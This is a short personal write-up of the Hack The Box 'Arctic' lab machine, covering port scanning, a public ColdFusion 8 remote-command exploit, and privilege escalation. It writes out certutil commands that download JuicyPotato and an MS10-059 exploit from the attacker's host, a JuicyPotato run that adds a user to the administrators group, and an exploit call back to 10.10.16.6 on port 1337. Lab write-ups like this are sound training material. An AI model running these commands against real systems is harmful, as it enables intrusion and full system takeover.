Arctic
Personal Rating: Easy
Enumeration
This is interesting:
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|Vista|8.1 (90%)Port 8500 might be “Adobe ColdFusion built-in web server”.
I tried this but it did not work: https://pentest.tonyng.net/attacking-adobe-coldfusion/
RCE
The admin page shows that it is ColdFusion 8.
This looks promising, which I found with searchsploit coldfusion 8:
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.pyThe exploit worked!
The user we have is “tolis”. It's a Windows Server 2008 R2 Standard with no hotfixes installed.
whoami /priv reveals that the user has the SeImpersonatePrivilege
Privilege Escalation
Since it is an old Windows and we have the SeImpersonatePrivilege, the Potato exploits came to mind.
Transfer the file:
certutil -urlcache -split -f "http://10.10.16.6:8000/JuicyPotato" juicypotato
This seems to have worked, but I do not know how to access the process:
.\juicypotato -l 1337 -p c:\windows\system32\cmd.exe -t *
This should add tolis to the admins group, which contains “net localgroup administrators tolis /add”:
.\JuicyPotato.exe -l 1337 -p C:\Users\tolis\privesc.bat -t *
This worked. I then tried to use the UACME project, but this is likely a very complicated way.
This was way easier:
certutil -urlcache -split -f "http://10.10.16.6:8000/MS10-059-Chimichurri.exe" exploit.exe
.\exploit.exe 10.10.16.6 1337I noticed that it can be fairly difficult to do easy boxes without Metasploit. The important takeaway is to enumerate vulnerabilities properly and choose a simple exploit to take less time, as there are multiple ways often times.
Last updated